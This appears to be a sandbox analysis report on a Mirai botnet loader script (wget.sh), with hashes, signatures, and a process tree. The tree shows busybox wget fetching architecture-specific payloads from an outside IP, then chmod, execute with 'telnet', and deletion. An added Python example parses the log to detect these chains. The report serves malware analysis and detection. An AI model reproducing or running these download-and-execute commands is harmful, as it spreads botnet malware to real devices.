Analysis
max time kernel: 19s
max time network: 117s
platform: debian-9_mips
resource: debian9-mipsbe-20240611-en
resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 10/03/2025, 22:22
Static task: static1
Behavioral task behavioral1: sample wget.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample wget.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample wget.sh, resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: sample wget.sh, resource debian9-mipsel-20240418-en
General
Target: wget.sh
Size: 1KB
MD5: fe3891afe068ca6fc86017361dfb753c
SHA1: d631b6a4eaa99085df4260727c2c86dc82cf5428
SHA256: 8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0
SHA512: 810560af118bf04a2723fb177bbdf25682e3cb8b95611e15c8d83576305ea41ba11dec0d42c410fc5b287cb8a31901f9190946e957ac8deb8c0d634a42334951
Malware Config
Extracted: family mirai, botnet BOTNET
Signatures
- Mirai family
- File and Directory Permissions Modification (1 TTP, 4 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid / process: 723 busybox; 738 busybox; 749 busybox; 755 busybox
- Executes dropped EXE (4 IoCs)
  ioc / pid / process: /tmp/jklarm 725 wget.sh; /tmp/jklarm5 739 wget.sh; /tmp/jklarm6 750 wget.sh; /tmp/jklarm7 756 wget.sh
- Writes file to tmp directory (4 IoCs)
  Malware often drops required files in the /tmp directory.
  description / ioc / process: File opened for modification /tmp/jklarm busybox; File opened for modification /tmp/jklarm5 busybox; File opened for modification /tmp/jklarm6 busybox; File opened for modification /tmp/jklarm7 busybox
Processes (indentation shows depth; signature hits in brackets)
PID 712  /tmp/wget.sh  [Executes dropped EXE]
    PID 713  /bin/busybox wget http://176.65.134.5/jklarm -O jklarm  [Writes file to tmp directory]
    PID 723  /bin/busybox chmod +x jklarm  [File and Directory Permissions Modification]
    PID 725  /tmp/jklarm, run as ./jklarm telnet
    PID 728  /bin/busybox rm -rf jklarm
    PID 730  /bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm5  [Writes file to tmp directory]
    PID 738  /bin/busybox chmod +x jklarm5  [File and Directory Permissions Modification]
    PID 739  /tmp/jklarm5, run as ./jklarm5 telnet
    PID 741  /bin/busybox rm -rf jklarm5
    PID 743  /bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm6  [Writes file to tmp directory]
    PID 749  /bin/busybox chmod +x jklarm6  [File and Directory Permissions Modification]
    PID 750  /tmp/jklarm6, run as ./jklarm6 telnet
    PID 753  /bin/busybox rm -rf jklarm6
    PID 754  /bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm7  [Writes file to tmp directory]
    PID 755  /bin/busybox chmod +x jklarm7  [File and Directory Permissions Modification]
    PID 756  /tmp/jklarm7, run as ./jklarm7 telnet
    PID 758  /bin/busybox rm -rf jklarm7
    PID 759  /bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k

Every child above is spawned by /tmp/wget.sh (PID 712). The script repeats one cycle per architecture: fetch the payload over plain HTTP from 176.65.134.5 with busybox wget, mark it executable, run it with the single argument "telnet", then delete the file from /tmp. The recorded trace ends with the jklm68k download; no chmod, execution or removal for that file appears in the process list.
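The fetch / chmod +x / execute / rm cycle in the process tree above is the whole behaviour of this loader, and it is what a detection should key on rather than the individual file names, which change per campaign. The following is an added example, not code from tria.ge or from the report: it replays the page's process list (transcribed into PROCESS_LOG as constructed input) and reconstructs each per-binary chain, flagging chains that are complete and the one that the trace cut off. The argv handling assumes busybox-style command lines of the form "/bin/busybox <applet> ..."; the function and class names are the example's own.

```python
"""Reconstruct Mirai-style loader chains (wget -> chmod +x -> exec -> rm) from a flat
process list. Added example; PROCESS_LOG is transcribed from the tria.ge tree above."""
import os
import shlex
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed input: (pid, command line) in the order tria.ge recorded them.
PROCESS_LOG = [
    (712, "/tmp/wget.sh"),
    (713, "/bin/busybox wget http://176.65.134.5/jklarm -O jklarm"),
    (723, "/bin/busybox chmod +x jklarm"),
    (725, "./jklarm telnet"),
    (728, "/bin/busybox rm -rf jklarm"),
    (730, "/bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm5"),
    (738, "/bin/busybox chmod +x jklarm5"),
    (739, "./jklarm5 telnet"),
    (741, "/bin/busybox rm -rf jklarm5"),
    (743, "/bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm6"),
    (749, "/bin/busybox chmod +x jklarm6"),
    (750, "./jklarm6 telnet"),
    (753, "/bin/busybox rm -rf jklarm6"),
    (754, "/bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm7"),
    (755, "/bin/busybox chmod +x jklarm7"),
    (756, "./jklarm7 telnet"),
    (758, "/bin/busybox rm -rf jklarm7"),
    (759, "/bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k"),
]

STAGES = ("wget", "chmod", "exec", "rm")


@dataclass
class Chain:
    """One dropped binary and the pid that performed each loader stage on it."""
    name: str
    url: str = ""
    pids: dict = field(default_factory=dict)       # stage -> pid
    exec_args: list = field(default_factory=list)  # argv passed to the binary

    @property
    def complete(self) -> bool:
        return all(stage in self.pids for stage in STAGES)


def _argv(cmdline: str) -> list:
    """Split a command line; drop the busybox wrapper so argv[0] is the applet."""
    argv = shlex.split(cmdline)
    if len(argv) > 1 and os.path.basename(argv[0]) == "busybox":
        argv = argv[1:]
    return argv


def find_loader_chains(log) -> dict:
    """Return {file name: Chain} for every 'wget -O <name>' seen, with later
    chmod / exec / rm events on the same name attached in order."""
    chains: dict = {}
    for pid, cmdline in log:
        argv = _argv(cmdline)
        if not argv:
            continue
        tool, args = argv[0], argv[1:]
        if tool == "wget" and "-O" in args:
            name = args[args.index("-O") + 1]
            url = next((a for a in args if a.startswith(("http://", "https://"))), "")
            chains[name] = Chain(name=name, url=url, pids={"wget": pid})
        elif tool == "chmod" and len(args) >= 2 and args[-1] in chains:
            chains[args[-1]].pids["chmod"] = pid
        elif tool == "rm" and args and args[-1] in chains:
            chains[args[-1]].pids["rm"] = pid
        else:
            # Direct execution of a dropped file: "./jklarm telnet" or "/tmp/jklarm telnet".
            name = os.path.basename(tool)
            if name in chains and "chmod" in chains[name].pids:
                chains[name].pids["exec"] = pid
                chains[name].exec_args = args
    return chains


def summarize(chains: dict) -> dict:
    """Collapse the chains into the IoCs a responder would block or hunt for."""
    hosts = {urlparse(c.url).hostname for c in chains.values() if c.url}
    return {
        "hosts": sorted(h for h in hosts if h),
        "complete": [c.name for c in chains.values() if c.complete],
        "incomplete": [c.name for c in chains.values() if not c.complete],
        "exec_args": sorted({tuple(c.exec_args) for c in chains.values() if c.exec_args}),
    }


if __name__ == "__main__":
    for name, chain in find_loader_chains(PROCESS_LOG).items():
        print(name, "complete" if chain.complete else "incomplete", chain.pids)
    print(summarize(find_loader_chains(PROCESS_LOG)))
```

The exec stage is only credited after a chmod on the same name, so a bare "./something" that was never downloaded by this script does not get folded into a chain. Running it against the transcribed log yields four complete chains, one incomplete chain for jklm68k, a single download host, and "telnet" as the only argument ever passed to a payload.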
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 60KB
  MD5: 35c215d8e2b2ea03a8a191fb3723195a
  SHA1: c38bcfc3d7050edeff1b7dbffd85d07348bb01e9
  SHA256: c4fd68b20997f3c8a60dbadf177b3309d465f0a8bb0ad9b33b4c70ee74dc3a90
  SHA512: ea5a9fda95965b6eb55c47eefe2b42a9234d13c8d05556e72e916f98a626a0a835fa7f7828d4051b6056d639b06bec0136afa9ac3157736702b94c0ed9effdf8
- Filesize: 60KB
  MD5: a04040c769cad786555e183ba8ae0ca0
  SHA1: a89d6b50a8140dddce29595c64949214e65c84f1
  SHA256: 7568e9e64ac1105cdcae20095154214ee943b2edc6c01e6d4b4eb0b7e06255a3
  SHA512: e152f552b99683b3bf9b9fee2f7d34027a291e02dd2f912620593e714774cfe07e14aa837cdb2f2a300d35b721dfd67e7012955e24352bdad0ffecb4e61ed162
- Filesize: 69KB
  MD5: 9e18604aa4c5bedd6e9ea6690b751880
  SHA1: c1f32fe93aa650f9920fc5bd659d23621ab034a2
  SHA256: 41342a887d2be09cf0165913b43a5916492e677d20429068d4829a090453ccbb
  SHA512: cdafb3281bcaa5f5c1af71df8d53c2d022de72a559dfea513b41bc08c7d8fe421839cfdc51b3f93f501bb62d02924e3047208e8bce3a8768af2404f3caa767b0
- Filesize: 82KB
  MD5: a9675614a267473cb83e195d9074a067
  SHA1: a4d148cf841fc2b84c8bb3dd322e40f601532875
  SHA256: fe4e8d464b7849a5483782d0c47e53deaf199e284badad12ed98ca79e47a79d9
  SHA512: 8adcc5df013328218823d3310bcc4f27f6e1e9e51de2e7ecd5521873f5ac6cc2315f9136e1599f1da4114e65eaed23449e78f9ce04062243aa8ec793086b1c28